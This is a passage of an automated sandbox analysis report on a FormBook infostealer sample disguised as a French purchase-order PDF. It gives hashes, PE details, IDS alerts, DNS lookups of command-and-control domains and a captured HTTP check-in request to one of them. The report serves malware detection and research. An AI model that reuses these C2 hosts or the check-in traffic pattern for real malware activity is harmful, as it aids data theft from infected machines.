                                                                banload.msiGet hashmaliciousBrowse
                                                                • 104.23.98.190
                                                                PO_1994.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                bothlee2010.exeGet hashmaliciousBrowse
                                                                • 172.65.232.115
                                                                D0CUMENT DE ENV#U00cdO.pdf.exeGet hashmaliciousBrowse
                                                                • 104.21.39.75

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nouveau bon de commande. 3007021_pdf.exe.log
                                                                Process:C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1314
                                                                Entropy (8bit):5.350128552078965
                                                                Encrypted:false
                                                                SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.7739369111242835
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:Nouveau bon de commande. 3007021_pdf.exe
                                                                File size:1327104
                                                                MD5:e1d1316d5bc047ec817b950286734ed0
                                                                SHA1:ae3cb4a0103f8daa9ec8f6dc00b6bfeb3f1c52ca
                                                                SHA256:6fd8c63bf53f7364e54505eb98e1b6fc005fbb691a65680e400e7b9104ad1795
                                                                SHA512:88a8f1555bc906728a9ab429899e2ae7d5eefa57128072607423cca26e36044160f6383f3568a581a786780a6a0fdd54cf13b9222c550dc6e66b8994fcc2b168
                                                                SSDEEP:24576:gzeFrYS/d3kYdkhlOAnxHRrjz+LVL+eQBDmwRGPoN7vdiTbnFM:5H2lOAnxHRrjz+ZL+eum/PoiM
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............P..6..........6S... ...`....@.. ....................................@................................

                                                                File Icon

                                                                Icon Hash:00828e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x545336
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0x6103A4B4 [Fri Jul 30 07:05:24 2021 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:v4.0.30319
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1452e40x4f.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1460000x5f0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1480000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x14359c0x143600False0.86088117873data7.77818810762IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x1460000x5f00x600False0.445963541667data4.25972931821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x1480000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_VERSION0x1460900x360data
                                                                RT_MANIFEST0x1464000x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Version Infos

                                                                DescriptionData
                                                                Translation0x0000 0x04b0
                                                                LegalCopyrightTeamViewer 2021 (C)
                                                                Assembly Version4.2.2.0
                                                                InternalNameTRACEENABLEIN.exe
                                                                FileVersion4.3.0.6
                                                                CompanyNameTeamViewer GmBh
                                                                LegalTrademarks
                                                                Comments
                                                                ProductNameGame Picture
                                                                ProductVersion4.3.0.6
                                                                FileDescriptionGame Picture
                                                                OriginalFilenameTRACEENABLEIN.exe

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                08/03/21-20:12:27.500344TCP1201ATTACK-RESPONSES 403 Forbidden804973823.227.38.74192.168.2.3
                                                                08/03/21-20:12:42.716824TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.323.227.38.74
                                                                08/03/21-20:12:42.716824TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.323.227.38.74
                                                                08/03/21-20:12:42.716824TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.323.227.38.74
                                                                08/03/21-20:12:42.819216TCP1201ATTACK-RESPONSES 403 Forbidden804974123.227.38.74192.168.2.3
                                                                08/03/21-20:12:53.832051TCP1201ATTACK-RESPONSES 403 Forbidden804974334.102.136.180192.168.2.3
                                                                08/03/21-20:13:09.239820TCP1201ATTACK-RESPONSES 403 Forbidden804974534.102.136.180192.168.2.3

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Aug 3, 2021 20:12:27.436156988 CEST4973880192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:27.453243971 CEST804973823.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:27.453488111 CEST4973880192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:27.453727007 CEST4973880192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:27.472434044 CEST804973823.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:27.500344038 CEST804973823.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:27.500381947 CEST804973823.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:27.500394106 CEST804973823.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:27.500406027 CEST804973823.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:27.500422955 CEST804973823.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:27.500665903 CEST4973880192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:27.500876904 CEST4973880192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:27.501168013 CEST804973823.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:27.501276970 CEST4973880192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:42.699892044 CEST4974180192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:42.716492891 CEST804974123.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:42.716787100 CEST4974180192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:42.716824055 CEST4974180192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:42.733342886 CEST804974123.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:42.819216013 CEST804974123.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:42.819238901 CEST804974123.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:42.819264889 CEST804974123.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:42.819279909 CEST804974123.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:42.819307089 CEST804974123.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:42.819319010 CEST804974123.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:42.819325924 CEST804974123.227.38.74192.168.2.3
                                                                Aug 3, 2021 20:12:42.819672108 CEST4974180192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:42.819794893 CEST4974180192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:42.819813013 CEST4974180192.168.2.323.227.38.74
                                                                Aug 3, 2021 20:12:47.996292114 CEST4974280192.168.2.3162.241.218.97
                                                                Aug 3, 2021 20:12:48.130711079 CEST8049742162.241.218.97192.168.2.3
                                                                Aug 3, 2021 20:12:48.130918026 CEST4974280192.168.2.3162.241.218.97
                                                                Aug 3, 2021 20:12:48.131254911 CEST4974280192.168.2.3162.241.218.97
                                                                Aug 3, 2021 20:12:48.265563011 CEST8049742162.241.218.97192.168.2.3
                                                                Aug 3, 2021 20:12:48.639825106 CEST4974280192.168.2.3162.241.218.97
                                                                Aug 3, 2021 20:12:48.816730976 CEST8049742162.241.218.97192.168.2.3
                                                                Aug 3, 2021 20:12:49.884164095 CEST8049742162.241.218.97192.168.2.3
                                                                Aug 3, 2021 20:12:49.884192944 CEST8049742162.241.218.97192.168.2.3
                                                                Aug 3, 2021 20:12:49.884237051 CEST4974280192.168.2.3162.241.218.97
                                                                Aug 3, 2021 20:12:49.884274960 CEST4974280192.168.2.3162.241.218.97
                                                                Aug 3, 2021 20:12:53.700675964 CEST4974380192.168.2.334.102.136.180
                                                                Aug 3, 2021 20:12:53.718132019 CEST804974334.102.136.180192.168.2.3
                                                                Aug 3, 2021 20:12:53.718368053 CEST4974380192.168.2.334.102.136.180
                                                                Aug 3, 2021 20:12:53.718667030 CEST4974380192.168.2.334.102.136.180
                                                                Aug 3, 2021 20:12:53.736108065 CEST804974334.102.136.180192.168.2.3
                                                                Aug 3, 2021 20:12:53.832051039 CEST804974334.102.136.180192.168.2.3
                                                                Aug 3, 2021 20:12:53.832240105 CEST804974334.102.136.180192.168.2.3
                                                                Aug 3, 2021 20:12:53.832550049 CEST4974380192.168.2.334.102.136.180
                                                                Aug 3, 2021 20:12:53.832717896 CEST4974380192.168.2.334.102.136.180
                                                                Aug 3, 2021 20:12:54.140171051 CEST4974380192.168.2.334.102.136.180
                                                                Aug 3, 2021 20:12:54.157627106 CEST804974334.102.136.180192.168.2.3
                                                                Aug 3, 2021 20:12:58.891522884 CEST4974480192.168.2.3160.153.138.219
                                                                Aug 3, 2021 20:12:58.918148994 CEST8049744160.153.138.219192.168.2.3
                                                                Aug 3, 2021 20:12:58.918302059 CEST4974480192.168.2.3160.153.138.219
                                                                Aug 3, 2021 20:12:58.918533087 CEST4974480192.168.2.3160.153.138.219
                                                                Aug 3, 2021 20:12:58.958533049 CEST8049744160.153.138.219192.168.2.3
                                                                Aug 3, 2021 20:12:58.958698988 CEST4974480192.168.2.3160.153.138.219
                                                                Aug 3, 2021 20:12:58.958794117 CEST4974480192.168.2.3160.153.138.219
                                                                Aug 3, 2021 20:12:58.985282898 CEST8049744160.153.138.219192.168.2.3
                                                                Aug 3, 2021 20:13:09.108089924 CEST4974580192.168.2.334.102.136.180
                                                                Aug 3, 2021 20:13:09.125828981 CEST804974534.102.136.180192.168.2.3
                                                                Aug 3, 2021 20:13:09.125950098 CEST4974580192.168.2.334.102.136.180
                                                                Aug 3, 2021 20:13:09.126152992 CEST4974580192.168.2.334.102.136.180
                                                                Aug 3, 2021 20:13:09.143661976 CEST804974534.102.136.180192.168.2.3
                                                                Aug 3, 2021 20:13:09.239820004 CEST804974534.102.136.180192.168.2.3
                                                                Aug 3, 2021 20:13:09.239846945 CEST804974534.102.136.180192.168.2.3
                                                                Aug 3, 2021 20:13:09.240035057 CEST4974580192.168.2.334.102.136.180
                                                                Aug 3, 2021 20:13:09.240223885 CEST4974580192.168.2.334.102.136.180
                                                                Aug 3, 2021 20:13:09.257615089 CEST804974534.102.136.180192.168.2.3

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Aug 3, 2021 20:11:00.119637012 CEST6015253192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:00.144845963 CEST53601528.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:01.155885935 CEST5754453192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:01.191153049 CEST53575448.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:02.806991100 CEST5598453192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:02.831685066 CEST53559848.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:04.280078888 CEST6418553192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:04.305874109 CEST53641858.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:05.857671976 CEST6511053192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:05.890221119 CEST53651108.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:07.277435064 CEST5836153192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:07.302346945 CEST53583618.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:09.425591946 CEST6349253192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:09.451982021 CEST53634928.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:10.466267109 CEST6083153192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:10.499224901 CEST53608318.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:11.445040941 CEST6010053192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:11.470299006 CEST53601008.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:12.427746058 CEST5319553192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:12.452907085 CEST53531958.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:14.053998947 CEST5014153192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:14.081715107 CEST53501418.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:15.510524035 CEST5302353192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:15.538009882 CEST53530238.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:17.467236042 CEST4956353192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:17.494744062 CEST53495638.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:19.426050901 CEST5135253192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:19.454372883 CEST53513528.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:20.406459093 CEST5934953192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:20.440412998 CEST53593498.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:21.625932932 CEST5708453192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:21.659025908 CEST53570848.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:23.145272970 CEST5882353192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:23.172739983 CEST53588238.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:24.771488905 CEST5756853192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:24.807224989 CEST53575688.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:29.927999020 CEST5054053192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:29.963937998 CEST53505408.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:36.519171953 CEST5436653192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:36.553138018 CEST53543668.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:11:48.243344069 CEST5303453192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:11:48.284015894 CEST53530348.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:05.225857973 CEST5776253192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:05.273794889 CEST53577628.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:10.325011969 CEST5543553192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:10.362365007 CEST53554358.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:17.091470003 CEST5071353192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:17.364865065 CEST53507138.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:27.393232107 CEST5613253192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:27.431001902 CEST53561328.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:32.533386946 CEST5898753192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:32.578701973 CEST53589878.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:37.597125053 CEST5657953192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:37.633867025 CEST53565798.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:40.097517967 CEST6063353192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:40.130326986 CEST53606338.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:41.913885117 CEST6129253192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:41.962208986 CEST53612928.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:42.651360035 CEST6361953192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:42.698307991 CEST53636198.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:47.864981890 CEST6493853192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:47.994066954 CEST53649388.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:53.660952091 CEST6194653192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:53.698920965 CEST53619468.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:12:58.853149891 CEST6491053192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:12:58.889425039 CEST53649108.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:13:03.992841005 CEST5212353192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:13:04.048928976 CEST53521238.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:13:09.068545103 CEST5613053192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:13:09.106823921 CEST53561308.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:13:14.253011942 CEST5633853192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:13:14.293872118 CEST53563388.8.8.8192.168.2.3
                                                                Aug 3, 2021 20:13:19.565293074 CEST5942053192.168.2.38.8.8.8
                                                                Aug 3, 2021 20:13:19.873693943 CEST53594208.8.8.8192.168.2.3

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Aug 3, 2021 20:12:17.091470003 CEST192.168.2.38.8.8.80xb2b9Standard query (0)www.jual-penggugurkandungan.comA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:27.393232107 CEST192.168.2.38.8.8.80xd12aStandard query (0)www.discountpty.comA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:32.533386946 CEST192.168.2.38.8.8.80xce7cStandard query (0)www.comericac.comA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:37.597125053 CEST192.168.2.38.8.8.80xa3adStandard query (0)www.n1getaccess.comA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:42.651360035 CEST192.168.2.38.8.8.80xceddStandard query (0)www.shopvybz.comA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:47.864981890 CEST192.168.2.38.8.8.80x697dStandard query (0)www.handybusy.comA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:53.660952091 CEST192.168.2.38.8.8.80x7370Standard query (0)www.theassistedadrscheme.comA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:58.853149891 CEST192.168.2.38.8.8.80x9feeStandard query (0)www.indiadesignstory.comA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:13:03.992841005 CEST192.168.2.38.8.8.80x9149Standard query (0)www.mybluemonitor.comA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:13:09.068545103 CEST192.168.2.38.8.8.80x3a7Standard query (0)www.trucktodock.comA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:13:14.253011942 CEST192.168.2.38.8.8.80x7416Standard query (0)www.travelawardsguide.comA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:13:19.565293074 CEST192.168.2.38.8.8.80x603aStandard query (0)www.signin-solution.comA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Aug 3, 2021 20:12:17.364865065 CEST8.8.8.8192.168.2.30xb2b9Name error (3)www.jual-penggugurkandungan.comnonenoneA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:27.431001902 CEST8.8.8.8192.168.2.30xd12aNo error (0)www.discountpty.combazar-panama.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                Aug 3, 2021 20:12:27.431001902 CEST8.8.8.8192.168.2.30xd12aNo error (0)bazar-panama.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                Aug 3, 2021 20:12:27.431001902 CEST8.8.8.8192.168.2.30xd12aNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:32.578701973 CEST8.8.8.8192.168.2.30xce7cName error (3)www.comericac.comnonenoneA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:37.633867025 CEST8.8.8.8192.168.2.30xa3adName error (3)www.n1getaccess.comnonenoneA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:42.698307991 CEST8.8.8.8192.168.2.30xceddNo error (0)www.shopvybz.comshop-vybz.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                Aug 3, 2021 20:12:42.698307991 CEST8.8.8.8192.168.2.30xceddNo error (0)shop-vybz.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                Aug 3, 2021 20:12:42.698307991 CEST8.8.8.8192.168.2.30xceddNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:47.994066954 CEST8.8.8.8192.168.2.30x697dNo error (0)www.handybusy.comhandybusy.comCNAME (Canonical name)IN (0x0001)
                                                                Aug 3, 2021 20:12:47.994066954 CEST8.8.8.8192.168.2.30x697dNo error (0)handybusy.com162.241.218.97A (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:53.698920965 CEST8.8.8.8192.168.2.30x7370No error (0)www.theassistedadrscheme.comtheassistedadrscheme.comCNAME (Canonical name)IN (0x0001)
                                                                Aug 3, 2021 20:12:53.698920965 CEST8.8.8.8192.168.2.30x7370No error (0)theassistedadrscheme.com34.102.136.180A (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:12:58.889425039 CEST8.8.8.8192.168.2.30x9feeNo error (0)www.indiadesignstory.comindiadesignstory.comCNAME (Canonical name)IN (0x0001)
                                                                Aug 3, 2021 20:12:58.889425039 CEST8.8.8.8192.168.2.30x9feeNo error (0)indiadesignstory.com160.153.138.219A (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:13:04.048928976 CEST8.8.8.8192.168.2.30x9149Name error (3)www.mybluemonitor.comnonenoneA (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:13:09.106823921 CEST8.8.8.8192.168.2.30x3a7No error (0)www.trucktodock.comtrucktodock.comCNAME (Canonical name)IN (0x0001)
                                                                Aug 3, 2021 20:13:09.106823921 CEST8.8.8.8192.168.2.30x3a7No error (0)trucktodock.com34.102.136.180A (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:13:14.293872118 CEST8.8.8.8192.168.2.30x7416No error (0)www.travelawardsguide.com217.160.0.64A (IP address)IN (0x0001)
                                                                Aug 3, 2021 20:13:19.873693943 CEST8.8.8.8192.168.2.30x603aNo error (0)www.signin-solution.comdom.iserver.spaceCNAME (Canonical name)IN (0x0001)
                                                                Aug 3, 2021 20:13:19.873693943 CEST8.8.8.8192.168.2.30x603aNo error (0)dom.iserver.spaceserver.domainsconfig.ruCNAME (Canonical name)IN (0x0001)
                                                                Aug 3, 2021 20:13:19.873693943 CEST8.8.8.8192.168.2.30x603aNo error (0)server.domainsconfig.ru193.142.59.163A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • www.discountpty.com
                                                                • www.shopvybz.com
                                                                • www.handybusy.com
                                                                • www.theassistedadrscheme.com
                                                                • www.indiadesignstory.com
                                                                • www.trucktodock.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.34973823.227.38.7480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Aug 3, 2021 20:12:27.453727007 CEST5523OUTGET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=xNYePOcIRg8tONHl062QEzR3pjdpSOb6qFMYs+u8dcNvqsBFMqM/aahx6CIdT83MIu1q HTTP/1.1
                                                                Host: www.discountpty.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Aug 3, 2021 20:12:27.500344038 CEST5524INHTTP/1.1 403 Forbidden
                                                                Date: Tue, 03 Aug 2021 18:12:27 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                X-Sorting-Hat-PodId: -1
                                                                X-Dc: gcp-europe-west1
                                                                X-Request-ID: 958672ac-771b-4294-8152-fabfc6d2d341
                                                                X-Content-Type-Options: nosniff
                                                                X-Permitted-Cross-Domain-Policies: none
                                                                X-XSS-Protection: 1; mode=block
                                                                X-Download-Options: noopen
                                                                CF-Cache-Status: DYNAMIC
                                                                Server: cloudflare
                                                                CF-RAY: 679183a7af874eb5-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
